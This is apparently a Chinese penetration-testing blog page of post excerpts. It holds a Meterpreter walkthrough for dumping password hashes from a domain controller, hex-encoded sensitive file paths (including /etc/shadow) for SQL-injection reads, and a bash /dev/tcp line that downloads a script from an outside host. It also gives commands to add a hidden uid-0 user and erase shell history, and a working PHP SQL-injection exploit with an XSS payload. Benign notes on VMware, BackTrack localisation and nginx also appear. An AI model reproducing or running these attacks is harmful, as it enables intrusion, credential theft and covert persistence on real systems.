Chinadu's Blog

感谢P总，人还不错，P总你懂的。

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12622 updated today (2011.05.15)

msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : DOMAINCONTROLLE
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x64 0
224 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
404 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
468 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
484 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
628 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
804 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
880 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
932 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
972 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
328 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1204 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
1252 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
1288 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
1316 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
1360 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1392 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1464 wlms.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wlms\wlms.exe
1492 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
1572 VMUpgradeHelper.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
1896 TPAutoConnSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2016 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
872 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1268 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2360 taskhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\taskhost.exe
2424 dwm.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\dwm.exe
2452 explorer.exe x64 1 SITTINGDUCK\juser C:\Windows\explorer.exe
2504 TPAutoConnect.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2512 conhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\conhost.exe
2632 VMwareTray.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2640 VMwareUser.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareUser.exe
2716 mmc.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\mmc.exe
3052 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2216 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1932 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2564 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1732 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2992 notepad.exe x86 1 SITTINGDUCK\juser C:\Windows\SysWOW64\notepad.exe
1720 notepad.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\notepad.exe

meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be ‘SYSTEM’…

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing… Maybe it requires that we be in a 64 bit process… PID 1720 was 64 bit version of Notepad, lets try that…

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as ‘SYSTEM’…

meterpreter > getsystem ...got system (via technique 1).

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter >

使用VMware经常会遇到预先为其分配的硬盘空间不够了，这时候就需要多划分一些硬盘空间给VMware使用，按照如下方法实现扩容：

环境：windows xp、VMware、fedora 10
步骤：1、在cmd窗口中输入：vmware-vdiskmanager -x 50GB "G:\CenOS.vmdk"
参数"-x"指定扩容后整个空间大小（包含现在正在使用的），"G:\CentOSvmdk" 指定需要
扩容的虚拟机磁盘文件。
此命令成功执行后已经为虚拟机分配空间了，但是内装的linux系统还不可使用。

2、进入虚拟机内装的LINUX系统，以root用户执行：
阅读全文...

汉化完成后重启，可以发现引导菜单已经被BT5所取代，在其中可以自由选择到win的MBR和到BT5系统。

进入BT5前连接网卡，这里以自带的gerix和feedingbottle（安装）分别演示：

打开菜单，找到gerix：

进入监控模式后，扫描，选择AP，
阅读全文...

整个汉化过程和以前的Backtrack4汉化过程差不多。
1.apt-get install language-support-zh language-pack-zh
2.Settings->System Settings->Locale->add languages 添加简体中文
3.如果没有添加简体中文的选项：apt-get install language-selector 安装完毕后就有了。
BackTrack5 的FireFox4.0.1 汉化：
在浏览器地址栏输入http://stage.mozilla.org/pub/mozilla.org/firefox/releases/4.0.1/linux-i686/xpi/zh-CN.xpi
回车后会出现提示,安装完毕后重启FireFox
继续在FireFox地址栏里输入"about:config" 回车，点我同意,然后在过滤器里输入"general.useragent.locale"
双击该项然后再弹出的对话框里输入"zh-CN",确定，重启浏览器

启动ibus输入法：

在system里面启动ibus,会出现如下提示：

IBus has been started! If you can not use IBus, please add below lines in $HOME/.bashrc, and relogin your desktop.
export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus

假如启动不了ibus:

cd /home

vim .bashrc

export GTK_IM_MODULE=ibus
export XMODIFIERS=@im=ibus
export QT_IM_MODULE=ibus

注销或重启

之后可以安装一些小工具：tsclient等

/etc/passwd 0x2F6574632F706173737764
/etc/shadow 0x2F6574632F736861646F77
/etc/issue 0x2F6574632F6973737565
/etc/fstab 0x2F6574632F6673746162
/etc/host.conf 0x2F6574632F686F73742E636F6E66
/etc/motd 0x2F6574632F6D6F7464
/etc/ld.so.conf 0x2F6574632F6C642E736F2E636F6E66
/etc/sysconfig/network-scripts/ifcfg-eth0 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746830
/etc/sysconfig/network-scripts/ifcfg-eth1 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746831
/var/www/htdocs/index.php 0x2F7661722F7777772F6874646F63732F696E6465782E706870
/var/www/conf/httpd.conf 0x2F7661722F7777772F636F6E662F68747470642E636F6E66
/var/www/htdocs/index.html 0x2F7661722F7777772F6874646F63732F696E6465782E68746D6C
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69
/var/httpd/htdocs/index.php 0x2F7661722F68747470642F6874646F63732F696E6465782E706870
/var/httpd/conf/httpd.conf 0x2F7661722F68747470642F636F6E662F68747470642E636F6E66
/var/httpd/htdocs/index.html 0x2F7661722F68747470642F6874646F63732F696E6465782E68746D6C
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69
/var/www/index.html 0x2F7661722F7777772F696E6465782E68746D6C
/var/www/index.php 0x2F7661722F7777772F696E6465782E706870
/opt/www/conf/httpd.conf 0x2F6F70742F7777772F636F6E662F68747470642E636F6E66
/opt/www/htdocs/index.php 0x2F6F70742F7777772F6874646F63732F696E6465782E706870
/opt/www/htdocs/index.html 0x2F6F70742F7777772F6874646F63732F696E6465782E68746D6C
/usr/local/apache/htdocs/index.html 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E68746D6C
/usr/local/apache/htdocs/index.php 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E706870
/usr/local/apache2/htdocs/index.html 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E68746D6C
/usr/local/apache2/htdocs/index.php 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E706870
/usr/local/httpd2.2/htdocs/index.php 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E706870
/usr/local/httpd2.2/htdocs/index.html 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E68746D6C
/tmp/apache/htdocs/index.html 0x2F746D702F6170616368652F6874646F63732F696E6465782E68746D6C
/tmp/apache/htdocs/index.php 0x2F746D702F6170616368652F6874646F63732F696E6465782E706870
/etc/httpd/htdocs/index.php 0x2F6574632F68747470642F6874646F63732F696E6465782E706870
/etc/httpd/conf/httpd.conf 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
/etc/httpd/htdocs/index.html 0x2F6574632F68747470642F6874646F63732F696E6465782E68746D6C
/www/php/php.ini 0x2F7777772F7068702F7068702E696E69
/www/php4/php.ini 0x2F7777772F706870342F7068702E696E69
/www/php5/php.ini 0x2F7777772F706870352F7068702E696E69
/www/conf/httpd.conf 0x2F7777772F636F6E662F68747470642E636F6E66
/www/htdocs/index.php 0x2F7777772F6874646F63732F696E6465782E706870
/www/htdocs/index.html 0x2F7777772F6874646F63732F696E6465782E68746D6C
阅读全文...

来源：mickey
1.安装依赖包
mickey@pentestbox:~# sudo apt-get install build-essential libssl-dev libssh-dev
2.下载/编译/安装
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install 阅读全文...

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat< &5 > c.pl

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null
阅读全文...

<?php

 

if(!$argv[1])

die("

 

Usage : php exploit.php [site]

Example : php exploit.php http://site.tld/[PATH]/

 

");

print_r("

 

# Tilte......: [ Easy Media Script SQL Injection ]

# Author.....: [ Lagripe-Dz ]

# Date.......: [ 27-o5-2o11 ]

# Location ..: [ ALGERIA ]

# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]

# Download ..: [ http://easymediascript.com/ ]

# Gr33tz ....: [ All Sec4ever Member'z ]

 

-==[ ExPloiT ]==-

 

# SQL Inj : http://site/ems/?watch=1'

# XSS : http://site/ems/?go=\"><

ScRiPt>alert(0)</ScRiPt>

 

-==[ Start ]==-

 

");

 

$t=array("db_user "=>"user()","db_version"=>"version()","db_name

"=>"database()",

"UserName "=>"user","Password "=>"pass");

 

foreach($t as $r=>$y){

 

<A href="mailto:$x=@file_get_contents($argv[1].%22?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23">$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");

 

preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);

 

echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed

!\n";

 

}

echo "[-] AdminPanel : ".$argv[1]."ip-admin/login.php\n";

 

print_r("

-==[ Finished ]==-

");

 

# END .. !

 

?>

 

Google服务器有时间连接速度很快，有时候很慢，甚至打不开。
由于站内搜索调用了Google的api，所以Google服务器很慢的时候右边栏就处于载入ing....
悲剧的Google...

# dropbox
174.36.30.71 dropbox.com
174.36.30.71 www.dropbox.com
75.101.129.115 dl.dropbox.com
75.101.159.151 dl-web.dropbox.com
174.36.30.71 forums.dropbox.com

#Search
74.125.39.99 www.google.com
74.125.39.103 www.google.com
74.125.39.104 www.google.com
74.125.39.105 www.l.google.com
阅读全文...

实际上，这个概念前段时间被炒的很热乎，不过那时候自己没有太关注Ngixn，也就没太在意，现在自己碰到了，就留意了一下。
我之前较早的nginx配置方案里面，做了文件系统检查（当初只是为了节约资源让Nginx来判断文件存在否，这样不把不存在的文件交给FastCGI来解析，能减轻FastCGI的负担，没想到意外的阻止了cgi.fix_pathinfo漏洞，真是一个惊喜！

#不存在的文件返回404
if (!-e $request_filename) {
return 404;
}

阅读全文...